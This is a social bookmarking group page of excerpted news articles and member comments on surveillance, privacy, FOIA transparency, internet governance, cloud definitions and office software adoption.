Skip to main content

Home/ Open Web/ Group items tagged responsive

Rss Feed Group items tagged

Paul Merrell

After Two Years, White House Finally Responds to Snowden Pardon Petition - With a "No" - 0 views

  • The White House on Tuesday ended two years of ignoring a hugely popular whitehouse.gov petition calling for NSA whistleblower Edward Snowden to be “immediately issued a full, free, and absolute pardon,” saying thanks for signing, but no. “We live in a dangerous world,” Lisa Monaco, President Obama’s adviser on homeland security and terrorism, said in a statement. More than 167,000 people signed the petition, which surpassed the 100,000 signatures that the White House’s “We the People” website said would garner a guaranteed response on June 24, 2013. In Tuesday’s response, the White House acknowledged that “This is an issue that many Americans feel strongly about.”
  • The White House on Tuesday ended two years of ignoring a hugely popular whitehouse.gov petition calling for NSA whistleblower Edward Snowden to be “immediately issued a full, free, and absolute pardon,” saying thanks for signing, but no. “We live in a dangerous world,” Lisa Monaco, President Obama’s adviser on homeland security and terrorism, said in a statement. More than 167,000 people signed the petition, which surpassed the 100,000 signatures that the White House’s “We the People” website said would garner a guaranteed response on June 24, 2013. In Tuesday’s response, the White House acknowledged that “This is an issue that many Americans feel strongly about.”
  • Monaco then explained her position: “Instead of constructively addressing these issues, Mr. Snowden’s dangerous decision to steal and disclose classified information had severe consequences for the security of our country and the people who work day in and day out to protect it.” Snowden didn’t actually disclose any classified information — news organizations including the Guardian, Washington Post, New York Times and The Intercept did the disclosing. And the Obama administration has yet to specify any “severe consequences” that can be independently confirmed.
  • ...1 more annotation...
  • The Snowden response was one of 20 responses to what the White House called “our We the People backlog.” The White House had been criticized for avoiding uncomfortable topics despite their popular support. On Twitter, the responses to the Snowden response, some from signers of the petition, were highly critica
Paul Merrell

Google Wants to Write Your Social Media Messages For You - Search Engine Watch (#SEW) - 0 views

  • Overwhelmed by social media? Google may have patented a solution for you, in the form of software that mimics the types of responses you make to update messages on various social networks. The patent, by Ashish Bhatia representing Google, describes a comprehensive social media bot, providing suitable yet seemingly personalized responses on social media platforms. Essentially, the program analyzes the messages a user makes through social networks, email, text messaging, microblogging, and other systems. Then, the program offers suggestions for responses, where the original messages are displayed, with information about others reactions to the same messages, and then the user can send the suggested messages in response to those users. The more the user utilizes the program and uses the responses, the more the bot can narrow down the types of responses you make.
  •  
    Visions of endless conversations between different people's bots with no human participation. Then a human being reads a reply and files a libel lawsuit against the human whose bot posted the reply. Can the defendant obtain dismissal on grounds that she did not write the message herself; her Google autoresponder did and therefore if anyone is liable it is Google?  Our Brave New (technological) World does and will pose many novel legal issues. My favorite so far: Assume that genetics have progressed to the point that unknown to Bill Gates, someone steals a bit of his DNA and implants it in a mother-to-be's egg. Is Bill Gates as the biological father liable for child support? Is that child an heir to Bill Gates' fortune? The current state of law in the U.S. would suggest that the answer to both questions is almost certainly "yes." The child itself is blameless and Bill Gates is his biological father.
Gary Edwards

Are the feds the first to a common cloud definition? | The Wisdom of Clouds - CNET News - 0 views

  •  
    Cisco's James Urquhart discusses the NIST definition of Cloud Computing. The National Institute of Technology and Standards is a non regulatory branch of the Commerce Department and is responsible for much of the USA's official participation in World Standards organizations. This is an important discussion, but i'm a bit disappointed by the loose use of the term "network". I guess they mean the Internet? No mention of RESTfull computing or Open Web Standards either. Some interesting clips: ...(The NIST's) definition of cloud computing will be the de facto standard definition that the entire US government will be given...In creating this definition, NIST consulted extensively with the private sector including a wide range of vendors, consultants and industry pundants including your truly. Below is the draft NIST working definition of Cloud Computing. I should note, this definition is a work in progress and therefore is open to public ratification & comment. The initial feedback was very positive from the federal CIO's who were presented it yesterday in DC. Baring any last minute lobbying I doubt we'll see many more major revisions. ....... Cloud computing is a pay-per-use model for enabling available, convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model promotes availability and is comprised of five key characteristics, three delivery models, and four deployment models.
  •  
    Gary, NIST really is not "responsible for much of the USA's official participation in World Standards organizations." Lots of legal analysis omitted, but the bottom line is that NIST would have had to be delegated that responsibility by the President, but never was. However, that did not stop NIST from signing over virtually all responsibility for U.S. participation in international standard development to the private ANSI, without so much as a public notice and comment rulemaking process. See section 3 at http://ts.nist.gov/Standards/Conformity/ansimou.cfm. Absolutely illegal, including at least two bright-line violations of the U.S. Constitution. But the Feds have unmistakably abdicated their legal responsibilities in regard to international standards to the private sector.
Gary Edwards

How To Create A Responsive, Mobile First WordPress Theme - 0 views

  •  
    tutorial on creating a responsive wordpress theme.  Excellent
Gary Edwards

Create a responsive wireframe | Tutorial | .net magazine - 0 views

  •  
    Nice tutorial for building a responsive framework using the open source "WireFly" framework solution.
Paul Merrell

Google Chrome Listening In To Your Room Shows The Importance Of Privacy Defense In Depth - 0 views

  • Yesterday, news broke that Google has been stealth downloading audio listeners onto every computer that runs Chrome, and transmits audio data back to Google. Effectively, this means that Google had taken itself the right to listen to every conversation in every room that runs Chrome somewhere, without any kind of consent from the people eavesdropped on. In official statements, Google shrugged off the practice with what amounts to “we can do that”.It looked like just another bug report. "When I start Chromium, it downloads something." Followed by strange status information that notably included the lines "Microphone: Yes" and "Audio Capture Allowed: Yes".
  • Without consent, Google’s code had downloaded a black box of code that – according to itself – had turned on the microphone and was actively listening to your room.A brief explanation of the Open-source / Free-software philosophy is needed here. When you’re installing a version of GNU/Linux like Debian or Ubuntu onto a fresh computer, thousands of really smart people have analyzed every line of human-readable source code before that operating system was built into computer-executable binary code, to make it common and open knowledge what the machine actually does instead of trusting corporate statements on what it’s supposed to be doing. Therefore, you don’t install black boxes onto a Debian or Ubuntu system; you use software repositories that have gone through this source-code audit-then-build process. Maintainers of operating systems like Debian and Ubuntu use many so-called “upstreams” of source code to build the final product.Chromium, the open-source version of Google Chrome, had abused its position as trusted upstream to insert lines of source code that bypassed this audit-then-build process, and which downloaded and installed a black box of unverifiable executable code directly onto computers, essentially rendering them compromised. We don’t know and can’t know what this black box does. But we see reports that the microphone has been activated, and that Chromium considers audio capture permitted.
  • This was supposedly to enable the “Ok, Google” behavior – that when you say certain words, a search function is activated. Certainly a useful feature. Certainly something that enables eavesdropping of every conversation in the entire room, too.Obviously, your own computer isn’t the one to analyze the actual search command. Google’s servers do. Which means that your computer had been stealth configured to send what was being said in your room to somebody else, to a private company in another country, without your consent or knowledge, an audio transmission triggered by… an unknown and unverifiable set of conditions.Google had two responses to this. The first was to introduce a practically-undocumented switch to opt out of this behavior, which is not a fix: the default install will still wiretap your room without your consent, unless you opt out, and more importantly, know that you need to opt out, which is nowhere a reasonable requirement. But the second was more of an official statement following technical discussions on Hacker News and other places. That official statement amounted to three parts (paraphrased, of course):
  • ...4 more annotations...
  • Of course, people were quick to downplay the alarm. “It only listens when you say ‘Ok, Google’.” (Ok, so how does it know to start listening just before I’m about to say ‘Ok, Google?’) “It’s no big deal.” (A company stealth installs an audio listener that listens to every room in the world it can, and transmits audio data to the mothership when it encounters an unknown, possibly individually tailored, list of keywords – and it’s no big deal!?) “You can opt out. It’s in the Terms of Service.” (No. Just no. This is not something that is the slightest amount of permissible just because it’s hidden in legalese.) “It’s opt-in. It won’t really listen unless you check that box.” (Perhaps. We don’t know, Google just downloaded a black box onto my computer. And it may not be the same black box as was downloaded onto yours. )Early last decade, privacy activists practically yelled and screamed that the NSA’s taps of various points of the Internet and telecom networks had the technical potential for enormous abuse against privacy. Everybody else dismissed those points as basically tinfoilhattery – until the Snowden files came out, and it was revealed that precisely everybody involved had abused their technical capability for invasion of privacy as far as was possible.Perhaps it would be wise to not repeat that exact mistake. Nobody, and I really mean nobody, is to be trusted with a technical capability to listen to every room in the world, with listening profiles customizable at the identified-individual level, on the mere basis of “trust us”.
  • If you think this is an excusable and responsible statement, raise your hand now.Now, it should be noted that this was Chromium, the open-source version of Chrome. If somebody downloads the Google product Google Chrome, as in the prepackaged binary, you don’t even get a theoretical choice. You’re already downloading a black box from a vendor. In Google Chrome, this is all included from the start.This episode highlights the need for hard, not soft, switches to all devices – webcams, microphones – that can be used for surveillance. A software on/off switch for a webcam is no longer enough, a hard shield in front of the lens is required. A software on/off switch for a microphone is no longer enough, a physical switch that breaks its electrical connection is required. That’s how you defend against this in depth.
  • 1) Yes, we’re downloading and installing a wiretapping black-box to your computer. But we’re not actually activating it. We did take advantage of our position as trusted upstream to stealth-insert code into open-source software that installed this black box onto millions of computers, but we would never abuse the same trust in the same way to insert code that activates the eavesdropping-blackbox we already downloaded and installed onto your computer without your consent or knowledge. You can look at the code as it looks right now to see that the code doesn’t do this right now.2) Yes, Chromium is bypassing the entire source code auditing process by downloading a pre-built black box onto people’s computers. But that’s not something we care about, really. We’re concerned with building Google Chrome, the product from Google. As part of that, we provide the source code for others to package if they like. Anybody who uses our code for their own purpose takes responsibility for it. When this happens in a Debian installation, it is not Google Chrome’s behavior, this is Debian Chromium’s behavior. It’s Debian’s responsibility entirely.3) Yes, we deliberately hid this listening module from the users, but that’s because we consider this behavior to be part of the basic Google Chrome experience. We don’t want to show all modules that we install ourselves.
  • Privacy remains your own responsibility.
  •  
    And of course, Google would never succumb to a subpoena requiring it to turn over the audio stream to the NSA. The Tor Browser just keeps looking better and better. https://www.torproject.org/projects/torbrowser.html.en
Paul Merrell

Facebook in talks with US watchdog to settle privacy investigation | Financial Times - 0 views

  • Facebook is in early talks with the US Federal Trade Commission over settling an investigation into privacy violations that could result in a record fine for the technology company, according to several people familiar with the situation. The US watchdog is investigating whether the social network broke a consent order that it signed with the FTC in 2011, which required it to be clear with users about how their data were being shared with third parties.According to two people familiar with the talks, negotiations over a settlement have started although no monetary figure has been agreed.The FTC opened its investigation into the social network’s privacy practices in March last year following the Cambridge Analytica scandal, in which the data of 87m users was improperly accessed by a third party. David Vladeck, a former FTC director who oversaw the 2011 agreement with Facebook, said he expected a major financial penalty. “I think it’s highly unlikely the FTC would impose a civil penalty under a billion dollars,” he said.
Gary Edwards

Leahy scuttles his warrantless e-mail surveillance bill | Politics and Law - CNET News - 0 views

  •  
    Many thanks to FreedomWorks and the Center for Democracy and Technology for the fine work they did in opposing this tyranny of our government trying to take over the Internet. excerpt: "Sen. Patrick Leahy has abandoned his controversial proposal that would grant government agencies more surveillance power -- including warrantless access to Americans' e-mail accounts -- than they possess under current law. The Vermont Democrat said today on Twitter that he would "not support such an exception" for warrantless access. The remarks came a few hours after a CNET article was published this morning that disclosed the existence of the measure. A vote on the proposal in the Senate Judiciary committee, which Leahy chairs, is scheduled for next Thursday. The amendments were due to be glued onto a substitute (PDF) to H.R. 2471, which the House of Representatives already has approved. Leahy's about-face comes in response to a deluge of criticism today, including the American Civil Liberties Union saying that warrants should be required, and the conservative group FreedomWorks launching a petition to Congress -- with more than 2,300 messages sent so far -- titled: "Tell Congress: Stay Out of My Email!" A spokesman for the senator did not respond to questions today from CNET asking for clarification of what Leahy would support next week. (We'll update this article if we receive a response.) A Democratic aide to the Judiciary committee did, however, tell CNET this afternoon that Leahy does not support broad exceptions for warrantless searches of e-mail content. A note from Leahy's Twitter account added: "Technology has created vacuum in privacy protection. Sen. Leahy believes that needs to be fixed, and #ECPA needs privacy updates." That's a reference to the 1986 Electronic Communications Privacy Act, which currently does not require that police always obtain a warrant for the contents of e-mail and other communications. This revised position will come as a relief to privacy
Gary Edwards

You Are (Probably) Wrong About You - 0 views

  •  
    When you fail to reach a goal - say, for instance, you give an important presentation and it doesn't go well - you become the detective (once again, largely unconsciously). You gather up the usual suspects to see who is responsible for your failure: lack of innate ability, lack of effort, poor preparation, using the wrong strategy, bad luck, etc. Of all of these possible culprits, it's lack of innate ability we most frequently hold responsible, like the much-maligned butler in an Agatha Christie novel. In Western countries - and nowhere more so than in the U.S. - innate ability is the go-to explanation for all of our successes and our failures. The problem is that the evidence - the kind gathered by scientists over the last thirty years of study of motivation and achievement - suggests that innate ability is rarely to blame for either succeeding or falling short. (If you've blamed your poor performances in the past on a lack of ability, don't feel bad. We've all done it. The butler seems guilty. Just please don't do it anymore.) If we are going to ever improve performance, we need to place blame where it belongs. We need solid evidence about where we went wrong. Unfortunately, that's the kind of evidence that usually doesn't make it to our consciousness on its own, making self-diagnosis practically impossible. We need help getting the right answers.
Paul Merrell

Most Agencies Falling Short on Mandate for Online Records - 0 views

  • Nearly 20 years after Congress passed the Electronic Freedom of Information Act Amendments (E-FOIA), only 40 percent of agencies have followed the law's instruction for systematic posting of records released through FOIA in their electronic reading rooms, according to a new FOIA Audit released today by the National Security Archive at www.nsarchive.org to mark Sunshine Week. The Archive team audited all federal agencies with Chief FOIA Officers as well as agency components that handle more than 500 FOIA requests a year — 165 federal offices in all — and found only 67 with online libraries populated with significant numbers of released FOIA documents and regularly updated.
  • Congress called on agencies to embrace disclosure and the digital era nearly two decades ago, with the passage of the 1996 "E-FOIA" amendments. The law mandated that agencies post key sets of records online, provide citizens with detailed guidance on making FOIA requests, and use new information technology to post online proactively records of significant public interest, including those already processed in response to FOIA requests and "likely to become the subject of subsequent requests." Congress believed then, and openness advocates know now, that this kind of proactive disclosure, publishing online the results of FOIA requests as well as agency records that might be requested in the future, is the only tenable solution to FOIA backlogs and delays. Thus the National Security Archive chose to focus on the e-reading rooms of agencies in its latest audit. Even though the majority of federal agencies have not yet embraced proactive disclosure of their FOIA releases, the Archive E-FOIA Audit did find that some real "E-Stars" exist within the federal government, serving as examples to lagging agencies that technology can be harnessed to create state-of-the art FOIA platforms. Unfortunately, our audit also found "E-Delinquents" whose abysmal web performance recalls the teletype era.
  • E-Delinquents include the Office of Science and Technology Policy at the White House, which, despite being mandated to advise the President on technology policy, does not embrace 21st century practices by posting any frequently requested records online. Another E-Delinquent, the Drug Enforcement Administration, insults its website's viewers by claiming that it "does not maintain records appropriate for FOIA Library at this time."
  • ...9 more annotations...
  • "The presumption of openness requires the presumption of posting," said Archive director Tom Blanton. "For the new generation, if it's not online, it does not exist." The National Security Archive has conducted fourteen FOIA Audits since 2002. Modeled after the California Sunshine Survey and subsequent state "FOI Audits," the Archive's FOIA Audits use open-government laws to test whether or not agencies are obeying those same laws. Recommendations from previous Archive FOIA Audits have led directly to laws and executive orders which have: set explicit customer service guidelines, mandated FOIA backlog reduction, assigned individualized FOIA tracking numbers, forced agencies to report the average number of days needed to process requests, and revealed the (often embarrassing) ages of the oldest pending FOIA requests. The surveys include:
  • The federal government has made some progress moving into the digital era. The National Security Archive's last E-FOIA Audit in 2007, " File Not Found," reported that only one in five federal agencies had put online all of the specific requirements mentioned in the E-FOIA amendments, such as guidance on making requests, contact information, and processing regulations. The new E-FOIA Audit finds the number of agencies that have checked those boxes is now much higher — 100 out of 165 — though many (66 in 165) have posted just the bare minimum, especially when posting FOIA responses. An additional 33 agencies even now do not post these types of records at all, clearly thwarting the law's intent.
  • The FOIAonline Members (Department of Commerce, Environmental Protection Agency, Federal Labor Relations Authority, Merit Systems Protection Board, National Archives and Records Administration, Pension Benefit Guaranty Corporation, Department of the Navy, General Services Administration, Small Business Administration, U.S. Citizenship and Immigration Services, and Federal Communications Commission) won their "E-Star" by making past requests and releases searchable via FOIAonline. FOIAonline also allows users to submit their FOIA requests digitally.
  • THE E-DELINQUENTS: WORST OVERALL AGENCIES In alphabetical order
  • Key Findings
  • Excuses Agencies Give for Poor E-Performance
  • Justice Department guidance undermines the statute. Currently, the FOIA stipulates that documents "likely to become the subject of subsequent requests" must be posted by agencies somewhere in their electronic reading rooms. The Department of Justice's Office of Information Policy defines these records as "frequently requested records… or those which have been released three or more times to FOIA requesters." Of course, it is time-consuming for agencies to develop a system that keeps track of how often a record has been released, which is in part why agencies rarely do so and are often in breach of the law. Troublingly, both the current House and Senate FOIA bills include language that codifies the instructions from the Department of Justice. The National Security Archive believes the addition of this "three or more times" language actually harms the intent of the Freedom of Information Act as it will give agencies an easy excuse ("not requested three times yet!") not to proactively post documents that agency FOIA offices have already spent time, money, and energy processing. We have formally suggested alternate language requiring that agencies generally post "all records, regardless of form or format that have been released in response to a FOIA request."
  • Disabilities Compliance. Despite the E-FOIA Act, many government agencies do not embrace the idea of posting their FOIA responses online. The most common reason agencies give is that it is difficult to post documents in a format that complies with the Americans with Disabilities Act, also referred to as being "508 compliant," and the 1998 Amendments to the Rehabilitation Act that require federal agencies "to make their electronic and information technology (EIT) accessible to people with disabilities." E-Star agencies, however, have proven that 508 compliance is no barrier when the agency has a will to post. All documents posted on FOIAonline are 508 compliant, as are the documents posted by the Department of Defense and the Department of State. In fact, every document created electronically by the US government after 1998 should already be 508 compliant. Even old paper records that are scanned to be processed through FOIA can be made 508 compliant with just a few clicks in Adobe Acrobat, according to this Department of Homeland Security guide (essentially OCRing the text, and including information about where non-textual fields appear). Even if agencies are insistent it is too difficult to OCR older documents that were scanned from paper, they cannot use that excuse with digital records.
  • Privacy. Another commonly articulated concern about posting FOIA releases online is that doing so could inadvertently disclose private information from "first person" FOIA requests. This is a valid concern, and this subset of FOIA requests should not be posted online. (The Justice Department identified "first party" requester rights in 1989. Essentially agencies cannot use the b(6) privacy exemption to redact information if a person requests it for him or herself. An example of a "first person" FOIA would be a person's request for his own immigration file.) Cost and Waste of Resources. There is also a belief that there is little public interest in the majority of FOIA requests processed, and hence it is a waste of resources to post them. This thinking runs counter to the governing principle of the Freedom of Information Act: that government information belongs to US citizens, not US agencies. As such, the reason that a person requests information is immaterial as the agency processes the request; the "interest factor" of a document should also be immaterial when an agency is required to post it online. Some think that posting FOIA releases online is not cost effective. In fact, the opposite is true. It's not cost effective to spend tens (or hundreds) of person hours to search for, review, and redact FOIA requests only to mail it to the requester and have them slip it into their desk drawer and forget about it. That is a waste of resources. The released document should be posted online for any interested party to utilize. This will only become easier as FOIA processing systems evolve to automatically post the documents they track. The State Department earned its "E-Star" status demonstrating this very principle, and spent no new funds and did not hire contractors to build its Electronic Reading Room, instead it built a self-sustaining platform that will save the agency time and money going forward.
Paul Merrell

EFF Pries More Information on Zero Days from the Government's Grasp | Electronic Fronti... - 0 views

  • Until just last week, the U.S. government kept up the charade that its use of a stockpile of security vulnerabilities for hacking was a closely held secret.1 In fact, in response to EFF’s FOIA suit to get access to the official U.S. policy on zero days, the government redacted every single reference to “offensive” use of vulnerabilities. To add insult to injury, the government’s claim was that even admitting to offensive use would cause damage to national security. Now, in the face of EFF’s brief marshaling overwhelming evidence to the contrary, the charade is over. In response to EFF’s motion for summary judgment, the government has disclosed a new version of the Vulnerabilities Equities Process, minus many of the worst redactions. First and foremost, it now admits that the “discovery of vulnerabilities in commercial information technology may present competing ‘equities’ for the [government’s] offensive and defensive mission.” That might seem painfully obvious—a flaw or backdoor in a Juniper router is dangerous for anyone running a network, whether that network is in the U.S. or Iran. But the government’s failure to adequately weigh these “competing equities” was so severe that in 2013 a group of experts appointed by President Obama recommended that the policy favor disclosure “in almost all instances for widely used code.” [.pdf].
  • The newly disclosed version of the Vulnerabilities Equities Process (VEP) also officially confirms what everyone already knew: the use of zero days isn’t confined to the spies. Rather, the policy states that the “law enforcement community may want to use information pertaining to a vulnerability for similar offensive or defensive purposes but for the ultimate end of law enforcement.” Similarly it explains that “counterintelligence equities can be defensive, offensive, and/or law enforcement-related” and may “also have prosecutorial responsibilities.” Given that the government is currently prosecuting users for committing crimes over Tor hidden services, and that it identified these individuals using vulnerabilities called a “Network Investigative Technique”, this too doesn’t exactly come as a shocker. Just a few weeks ago, the government swore that even acknowledging the mere fact that it uses vulnerabilities offensively “could be expected to cause serious damage to the national security.” That’s a standard move in FOIA cases involving classified information, even though the government unnecessarily classifies documents at an astounding rate. In this case, the government relented only after nearly a year and a half of litigation by EFF. The government would be well advised to stop relying on such weak secrecy claims—it only risks undermining its own credibility.
  • The new version of the VEP also reveals significantly more information about the general process the government follows when a vulnerability is identified. In a nutshell, an agency that discovers a zero day is responsible for invoking the VEP, which then provides for centralized coordination and weighing of equities among all affected agencies. Along with a declaration from an official at the Office of the Director of National Intelligence, this new information provides more background on the reasons why the government decided to develop an overarching zero day policy in the first place: it “recognized that not all organizations see the entire picture of vulnerabilities, and each organization may have its own equities and concerns regarding the prioritization of patches and fixes, as well as its own distinct mission obligations.” We now know the VEP was finalized in February 2010, but the government apparently failed to implement it in any substantial way, prompting the presidential review group’s recommendation to prioritize disclosure over offensive hacking. We’re glad to have forced a little more transparency on this important issue, but the government is still foolishly holding on to a few last redactions, including refusing to name which agencies participate in the VEP. That’s just not supportable, and we’ll be in court next month to argue that the names of these agencies must be disclosed. 
Paul Merrell

Hey ITU Member States: No More Secrecy, Release the Treaty Proposals | Electronic Front... - 0 views

  • ...4 more comments...
  •  
    The International Telecommunication Union (ITU) will hold the World Conference on International Telecommunications (WCIT-12) in December in Dubai, an all-important treaty-writing event where ITU Member States will discuss the proposed revisions to the International Telecommunication Regulations (ITR). The ITU is a United Nations agency responsible for international telecom regulation, a bureaucratic, slow-moving, closed regulatory organization that issues treaty-level provisions for international telecommunication networks and services. The ITR, a legally binding international treaty signed by 178 countries, defines the boundaries of ITU's regulatory authority and provides "general principles" on international telecommunications. However, media reports indicate that some proposed amendments to the ITR-a negotiation that is already well underway-could potentially expand the ITU's mandate to encompass the Internet.
  •  
    The ITU Member States should urgently lift restrictions on sharing the preparatory materials and ITR amendments, and release the documents. The current preparatory process lacks the transparency, openness of process, and inclusiveness of all relevant stakeholders that is the hallmark of Internet policy-making. A truly multi-stakeholder participation model requires equal footing for each relevant stakeholders including civil society, the private sector, the technical community, and participating governments. These principles are the minimum that one could expect following commitments made at the World Summit on Information Society (WSIS). The ITU Secretary-General Dr. Hamadoun I. Touré reiterated these commitments last year at the Internet Governance Forum in Kenya: In its own words, the "ITU remains firmly committed to the WSIS process," and it considers itself to have "made considerable progress in many areas in advancing the implementation of the WSIS outcomes." And in practice? Not likely. This is why EFF, European Digital Rights, CIPPIC and CDT and a coalition of civil society organizations from around the world are demanding that the ITU Secretary General, the WCIT-12 Council Working Group, and ITU Member States open up the WCIT-12 and the Council working group negotiations, by immediately releasing all the preparatory materials and Treaty proposals. If it affects the digital rights of citizens across the globe, the public needs to know what is going on and deserves to have a say. The Council Working Group is responsible for the preparatory work towards WCIT-12, setting the agenda for and consolidating input from participating governments and Sector Members.
  •  
    We demand full and meaningful participation for civil society in its own right, and without cost, at the Council Working Group meetings and the WCIT on equal footing with all other stakeholders, including participating governments. A transparent, open process that is inclusive of civil society at every stage is crucial to creating sound policy. Respect the multi-stakeholder process Civil society has good reason to be concerned regarding an expanded ITU policy-making role. To begin with, the institution does not appear to have high regard for the distributed multi-stakeholder decision making model that has been integral to the development of an innovative, successful and open Internet. In spite of commitments at WSIS to ensure Internet policy is based on input from all relevant stakeholders, the ITU has consistently put the interests of one stakeholder-Governments-above all others. This is discouraging, as some government interests are inconsistent with an open, innovative network. Indeed, the conditions which have made the Internet the powerful tool it is today emerged in an environment where the interests of all stakeholders are given equal footing, and existing Internet policy-making institutions at least aspire, with varying success, to emulate this equal footing. This formula is enshrined in the Tunis Agenda, which was committed to at WSIS in 2005:
  •  
    83. Building an inclusive development-oriented Information Society will require unremitting multi-stakeholder effort. We thus commit ourselves to remain fully engaged-nationally, regionally and internationally-to ensure sustainable implementation and follow-up of the outcomes and commitments reached during the WSIS process and its Geneva and Tunis phases of the Summit. Taking into account the multifaceted nature of building the Information Society, effective cooperation among governments, private sector, civil society and the United Nations and other international organizations, according to their different roles and responsibilities and leveraging on their expertise, is essential. 84. Governments and other stakeholders should identify those areas where further effort and resources are required, and jointly identify, and where appropriate develop, implementation strategies, mechanisms and processes for WSIS outcomes at international, regional, national and local levels, paying particular attention to people and groups that are still marginalized in their access to, and utilization of, ICTs.
  •  
    Indeed, the ITU's current vision of Internet policy-making is less one of distributed decision-making, and more one of 'taking control.' For example, in an interview conducted last June with ITU Secretary General Hamadoun Touré, Russian Prime Minister Vladimir Putin raised the suggestion that the union might take control of the Internet: "We are thankful to you for the ideas that you have proposed for discussion," Putin told Touré in that conversation. "One of them is establishing international control over the Internet using the monitoring and supervisory capabilities of the International Telecommunication Union (ITU)." Rights to online expression are unlikely to fare much better than privacy under an ITU model. During last year's IGF in Kenya, a voluntary code of conduct was issued to further restrict free expression online. A group of nations (including China, the Russian Federation, Tajikistan and Uzbekistan) released a Resolution for the UN General Assembly titled, "International Code of Conduct for Information Security." The Code seems to be designed to preserve and protect national powers in information and communication. In it, governments pledge to curb "the dissemination of information that incites terrorism, secessionism or extremism or that undermines other countries' political, economic and social stability, as well as their spiritual and cultural environment." This overly broad provision accords any state the right to censor or block international communications, for almost any reason.
  •  
    We urge the ITU Secretary General et al to ensure that the outcomes of the WCIT and its preparatory process truly represent the common interests of all who hold a stake in the future of our information society. If your government is a member of ITU, demand transparency and tell them to open the process and disclose the WCIT preparatory documents and Treaty amendments.
Gary Edwards

Office Productivity Software Is No Closer To Becoming A Commodity | Forrester Blogs - 0 views

  • We just published a report on the state of adoption of Office 2013 And Productivity Suite Alternatives based on a survey of 155 Forrester clients with responsibility for those investments. The sample does not fully represent the market, but lets us draw comparisons to the results of our previous survey in 2011. Some key takeaways from the data:   One in five firms uses email in the cloud. Another quarter plans to move at some point. More are using Office 365 (14%) than Google Apps (9%).  Just 22% of respondents are on Office 2013. Another 36% have plans to be on it. Office 2013's uptake will be slower than Office 2010 because fewer firms plan to combine the rollout of Office 2013 with Windows 8 as they combined Office 2010 with Windows 7. Alternatives to Microsoft Office show little traction. In 2011, 13% of respondents supported open source alternatives to Office. This year the number is just 5%. Google Docs has slightly higher adoption and is in use at 13% of companies. 
  • Microsoft continues to have a stranglehold on office productivity in the enterprise: Just 6% of companies in our survey give all or some employees an alternative instead of the installed version of Microsoft Office. Most surprising of all, multi-platform support is NOT a priority. Apps on iOS and Android devices were important to 16% of respondents, and support for non-Windows PCs was important to only 11%. For now, most technology decision-makers seem satisfied with leaving employees to self-provision office productivity apps on their smartphones and tablets if they really want them. 
  • Do you think we're getting closer to replacing Microsoft Office in the workplace?
  •  
    "We (Forrester) just published a report on the state of adoption of Office 2013 And Productivity Suite Alternatives based on a survey of 155 Forrester clients with responsibility for those investments. The sample does not fully represent the market, but lets us draw comparisons to the results of our previous survey in 2011. Some key takeaways from the data:   One in five firms uses email in the cloud. Another quarter plans to move at some point. More are using Office 365 (14%) than Google Apps (9%).  Just 22% of respondents are on Office 2013. Another 36% have plans to be on it. Office 2013's uptake will be slower than Office 2010 because fewer firms plan to combine the rollout of Office 2013 with Windows 8 as they combined Office 2010 with Windows 7. Alternatives to Microsoft Office show little traction. In 2011, 13% of respondents supported open source alternatives to Office. This year the number is just 5%. Google Docs has slightly higher adoption and is in use at 13% of companies. "
Paul Merrell

Information Warfare: Automated Propaganda and Social Media Bots | Global Research - 0 views

  • NATO has announced that it is launching an “information war” against Russia. The UK publicly announced a battalion of keyboard warriors to spread disinformation. It’s well-documented that the West has long used false propaganda to sway public opinion. Western military and intelligence services manipulate social media to counter criticism of Western policies. Such manipulation includes flooding social media with comments supporting the government and large corporations, using armies of sock puppets, i.e. fake social media identities. See this, this, this, this and this. In 2013, the American Congress repealed the formal ban against the deployment of propaganda against U.S. citizens living on American soil. So there’s even less to constrain propaganda than before.
  • Information warfare for propaganda purposes also includes: The Pentagon, Federal Reserve and other government entities using software to track discussion of political issues … to try to nip dissent in the bud before it goes viral “Controlling, infiltrating, manipulating and warping” online discourse Use of artificial intelligence programs to try to predict how people will react to propaganda
  • Some of the propaganda is spread by software programs. We pointed out 6 years ago that people were writing scripts to censor hard-hitting information from social media. One of America’s top cyber-propagandists – former high-level military information officer Joel Harding – wrote in December: I was in a discussion today about information being used in social media as a possible weapon.  The people I was talking with have a tool which scrapes social media sites, gauges their sentiment and gives the user the opportunity to automatically generate a persuasive response. Their tool is called a “Social Networking Influence Engine”. *** The implications seem to be profound for the information environment. *** The people who own this tool are in the civilian world and don’t even remotely touch the defense sector, so getting approval from the US Department of State might not even occur to them.
  • ...2 more annotations...
  • How Can This Real? Gizmodo reported in 2010: Software developer Nigel Leck got tired rehashing the same 140-character arguments against climate change deniers, so he programmed a bot that does the work for him. With citations! Leck’s bot, @AI_AGW, doesn’t just respond to arguments directed at Leck himself, it goes out and picks fights. Every five minutes it trawls Twitter for terms and phrases that commonly crop up in Tweets that refute human-caused climate change. It then searches its database of hundreds to find a counter-argument best suited for that tweet—usually a quick statement and a link to a scientific source. As can be the case with these sorts of things, many of the deniers don’t know they’ve been targeted by a robot and engage AI_AGW in debate. The bot will continue to fire back canned responses that best fit the interlocutor’s line of debate—Leck says this goes on for days, in some cases—and the bot’s been outfitted with a number of responses on the topic of religion, where the arguments unsurprisingly often end up. Technology has come a long way in the past 5 years. So if a lone programmer could do this 5 years ago, imagine what he could do now. And the big players have a lot more resources at their disposal than a lone climate activist/software developer does.  For example, a government expert told the Washington Post that the government “quite literally can watch your ideas form as you type” (and see this).  So if the lone programmer is doing it, it’s not unreasonable to assume that the big boys are widely doing it.
  • How Effective Are Automated Comments? Unfortunately, this is more effective than you might assume … Specifically, scientists have shown that name-calling and swearing breaks down people’s ability to think rationally … and intentionally sowing discord and posting junk comments to push down insightful comments  are common propaganda techniques. Indeed, an automated program need not even be that sophisticated … it can copy a couple of words from the main post or a comment, and then spew back one or more radioactive labels such as “terrorist”, “commie”, “Russia-lover”, “wimp”, “fascist”, “loser”, “traitor”, “conspiratard”, etc. Given that Harding and his compadres consider anyone who questions any U.S. policies as an enemy of the state  – as does the Obama administration (and see this) – many honest, patriotic writers and commenters may be targeted for automated propaganda comments.
Paul Merrell

The All Writs Act, Software Licenses, and Why Judges Should Ask More Questions | Just S... - 0 views

